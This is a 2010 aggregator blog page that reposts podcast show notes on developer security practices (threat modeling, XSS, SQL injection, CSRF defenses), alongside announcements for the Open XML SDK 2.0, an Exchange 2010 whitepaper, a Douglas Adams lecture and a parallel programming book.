camurphy's posterous

Herding Code 75: Barry Dorrans on Developer Security

Herding Code 75: Barry Dorrans on Developer Security

This week on Herding Code, Barry Dorrans educates, entertains, insults and scares us with his expert commentary on application security, threat modeling, analysis tools and common attacks.  You’ve been waiting for this show.  I just know it.  Listen in as Barry talks security, pimps his new book, and comments on his new position at Microsoft, book burnings, guns, money, proper pronunciation and Jon’s bald head.

  • Scott K shares that public facing applications and services seem to get the least attention when it comes to security – until there’s an audit. Barry talks about the lack of security education and how training should be baked in from the ground up.
  • Jon notes that folks don’t start off projects thinking about security.  First you code and then you worry about the risk.  Barry speaks to the Security Development Lifecycle (SDL) and continuous threat modeling.
  • Scott K asks if there is a security checklist which developers should consult when developing a web application.  Barry references his book, OWASP, CDE and Miter.  Barry states that can’t think like a hacker but you can think about the risks and “what happens if this goes wrong” or “I leak this information” or “there is a cross site scripting attack.”
  • Jon notes there are some security measures which are baked into the .NET Framework.  Barry talks about a defense in depth strategy and the Web Protection Library (WPL.)
  • Barry dives into a few of the security and code analysis tools like CAT.NET and FxCop which are available for Visual Studio.  But how, by the way, no tool offers a silver bullet.
  • Scott K asks where emphasis should be placed when implementing security measures.  Barry responds by putting his security hat on and assuming that all users are scum.  Trust no one!
  • The guys get into encoding rules (when and where), XSS, SQL Injection and Cross-site request forgery.  Jon asks more about the measures built into ASP.NET Webforms and ASP.NET MVC which help prevent attacks.
  • Kevin asks a question about automatic encoding by the framework.  Barry states this is a tricky solution to implement and suggests that frameworks should provide tools but developers should handle the encoding manually. Jon notes the new syntax in MVC 2 which facilitates this approach.
  • Jon asks about testing frameworks and asks Barry for a checklist of steps which developers must complete if they wish to secure their applications.  Barry rattles off a bunch of must-dos actions, pimps his book and pokes fun at American money.
  • The guys talk about RIA, Silverlight and Flash and briefly touch upon security benefits and issues.  And then they discuss social engineering security/privacy issues.
  • Scott K moves away from web applications and services.  What about client applications?  Barry talks about trusted sources, and the .NET and Java sandboxes.  And the guys speak of OS sandboxes and vitualizing applications and Code Access Security (CAS.)
  • Barry talks about FoxPro thanks to a Twitter question from @jglazano and the show finishes up with talk about blue and black hats, security snake oil and scary security stories.  But wait!  Jon remembers he wanted to talk about OpenId and the show continues with a discussion about OpenId, CardSpace and OAuth and OAuth WRAP.

Show Links:

Show notes compiled by Ben Griswold. Thanks!

Download / Listen:

Herding Code 75: Barry Dorrans on Developer Security

Image001

Enclosure: HerdingCode-0075-Barry-Dorrans-on-Developer-Security.mp3

Douglas Adams lecture

Douglas Adams lecture

Here's an 80-minute Douglas Adams lecture entitled "Parrots, the universe and everything from the University of California in 2001.

Douglas Adams: Parrots, the universe and everything (Thanks, Arkizzle!)

Announcing the Release of the Open XML SDK 2.0

Announcing the Release of the Open XML SDK 2.0

Today, I am really excited to announce the worldwide availability of the Open XML SDK 2.0 for Microsoft Office! The Open XML SDK plays an integral part in creating Office document solutions that work on the client or server. The Open XML SDK allows you to create, consume, and manipulate Open XML files without needing to automate Office client applications. Combining the power of Office Services and the Open XML SDK enables even more scenarios, such as rich server-side document assembly solutions. No longer will you need to pay special attention to one of Office's most popular knowledge base articles that talks about how automating Office client applications on the server is not supported (http://support.microsoft.com/kb/257757).

Development of the Open XML SDK 2.0 spanned almost two years and involved the release of four Technical Previews in addition to the final release announced today. Your feedback via the blogs, MSDN forums, www.openxmldeveloper.com forums, and Microsoft Connect site helped shape the overall design of the SDK. Thank you so much for your support and feedback! Please feel free to continue sending us feedback with respect to the Open XML SDK.

Download the SDK

Image001

Download the Open XML SDK 2.0 for Microsoft Office
This download provides strongly typed part and content classes for use with Office 2007 & Office 2010 Open XML documents. http://www.microsoft.com/downloads/details.aspx?FamilyID=c6e744e5-36e9-45f5-8d8c-331df206e0d0

Release Notes

  • Open XML SDK 2.0 is freely redistributable by any solution provider implementing the formats
  • Office applications are not required to use the Open XML SDK 2.0, and no software purchase is required. Developers can freely use the Open XML SDK to build document processing solutions for Microsoft Office files and for other implementations of the IS29500 standard

Learn More about the Open XML SDK

Over the past year and a half, I have shown you guys a lot of real world scenarios/solutions that are built with the SDK. Here is a summary of links that will help you learn more about the Open XML SDK:

  • MSDN
  • This site is your one-stop shop for finding all information related to Open XML and the Open XML SDK
  • Office Developer Center
  • Office Visual-How-To sites
  • An overview of Open XML SDK 2.0 for Microsoft Office
  • Class Library References
  • Microsoft Office File Format Documents
  • YouTube Videos
  • Forum & Blogs
  • Conference Presentations

    In a future post I will outline the improvements we made to the Open XML SDK 2.0 compared to the December 2009 CTP.

    Zeyad Rajabi

    Image002

    Brian Jones: Office Extensibility / Fri, 12 Mar 2010 22:49:12 GMT

    Whitepaper: The Microsoft Large Mailbox Vision

    Whitepaper: The Microsoft Large Mailbox Vision

    Giving your users the ability to store more e-mail has many advantages. Large mailboxes keep e-mail on the Exchange Server instead of allowing it to be scattered in Outlook Data Files (.PST files). That helps reduce the risk of data loss, improve regulatory compliance, and increase productivity among both workers and IT staff. The main barrier to implementing large mailboxes is the perceived cost and complexity of storing large amounts of e-mail data.

    Microsoft® Exchange Server 2010 is specifically designed to overcome these barriers. It enables you to give your users larger mailboxes at lower cost without sacrificing performance or reliability. Built-in high availability and disaster recovery, storage system improvements, and self-healing from disk faults let you use large, inexpensive disks in configurations that maximize data redundancy. And, Exchange Server 2010 lets you keep your users online during mailbox moves. With these changes, the benefits of large mailboxes are now within the grasp of all organizations.

    Image001

     

     Download details Exchange 2010 Large Mailbox Vision Whitepaper

    Parallel Programming Patterns Book

    Parallel Programming Patterns Book

    Friday, February 26, 2010 – 4:41 pm

    Image001
    Since running the Patterns of Parallel Programming Workshop at PDC 2009  we (patterns & practices) have been working on what to do next to help people understand the opportunities and challenges afforded by parallelism and some of the new features of Visual Studio 2010.

    We’re in the process of kicking off this project now…

    We have a Parallel Patterns CodePlex site and will be posting content there and asking for feedback. Currently you can read the working outline for the book and see the first cut at one of the samples.

    In the next five or six months we’ll be creating the content for the book. If you’re interested in providing feedback then please review the content and add feedback as a discussion item.

    http://www.ademiller.com/blogs/tech/2010/02/parallel-programming-patterns-book/